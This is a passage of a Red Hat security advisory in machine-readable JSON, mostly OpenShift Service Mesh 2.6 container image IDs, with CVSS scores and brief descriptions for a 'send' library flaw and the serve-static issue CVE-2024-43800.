"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
